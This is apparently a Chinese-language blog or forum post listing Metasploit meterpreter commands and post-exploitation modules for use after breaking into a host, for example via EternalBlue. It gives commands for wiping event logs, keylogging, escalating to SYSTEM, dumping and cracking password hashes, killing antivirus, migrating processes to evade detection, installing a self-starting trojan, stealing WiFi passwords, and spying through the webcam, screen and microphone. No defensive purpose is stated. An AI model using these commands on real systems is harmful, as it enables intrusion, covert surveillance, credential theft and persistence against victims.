通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块
一、命令
1、arp
查看内网主机
2、background
将当前的会话转在后台运行。从而进行新的渗透测试。
如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令
3、clearev
清除系统,软件之类的所有登陆信息
4、download、upload
download可以下载目标系统的文件
upload可以上传本机文件到目标系统
目标机成功上传
5、edit
编辑命令,运行的是vim编辑器
查看目标机,成功写入
6、execute
执行命令,可执行脚本或程序
7、getprivs
查看当前用户具备的权限
8、getuid
查看 meterpreter 所在的用户组,或者说是你目前所拥有的权限
getsystem
提权为管理员
9、sysinfo
查看计算机系统和名称等详细信息
10、idletime
查看目标系统运行了多长时间
11、keyscan_start 开启键盘记录
keyscan_dump 键盘记录下载
keyscan_stop 停止键盘记录
12、load
加载一些带有其他功能(后门)的软件
13、lpwd与lcd
Lpwd:
显示本地目录,也就是你自己所在的自己系统的位置。
Lcd:
进入本地目录。也就是进入你自己系统的目录
14、ps
查看目标系统的所有进程。
如果没有root权限或者administrator权限,可以先查看进程,随后根据进程分析目标系统运行了什么软件。可以查找哪些软件有命令执行漏洞用来提权。甚至你还可以查看到目标系统用什么数据库之类的等等。
15、screenshot
截取目标系统屏幕
16、search
搜索目标系统的文件
17、shell
在目标系统打开一个命令行窗口,相当于cmd
出现乱码可以输入 chcp 65001
18、web_list 查看目标机器上是否有网络摄像头,并且列举出来
webcam_snap 连接目标系统的摄像头
二、模块
1、hashdump 获取目标系统哈希值
run post/windows/gather/hashdump
把获取到的哈希值在彩虹表中进行破解,访问md5在线解密破解,md5解密加密
2、migrate
run post/windows/manage/migrate
可以将meterpreter当前的进程移动到一个新的进程。
主要用来防软杀,或者进程不稳定的时候使用这个模块。
成功由2364进程迁移到2272进程
3、run killav 关闭对方杀软
run /post/windows/manage/killav
4、run post/windows/gather/enum_computers
枚举 Windows 域内所有用户,不包含目标主机
5、run persistence
写入硬盘,下次目标主机启动时,木马将会自启动(不一定成功,建议重新上传后门)
6、run post/multi/gather/wlan_geolocate
基于WLAN进行地理位置确认。
Ø/root/.msf4/loot ,如果通过该模块获得了地理信息,会在该文件夹下生 成TXT文件
7、run hashdump
获取目标系统哈希值,包括密码提示,需要有”system“权限
8、run service_manager
目标主机系统服务管理
9、run post/windows/wlan/wlan_profile
获取目标主机WiFi密码
10、run vnc
屏幕实时监控
配合run sound_recoder(录制声音) ,run webcam(开启摄像头),效果更佳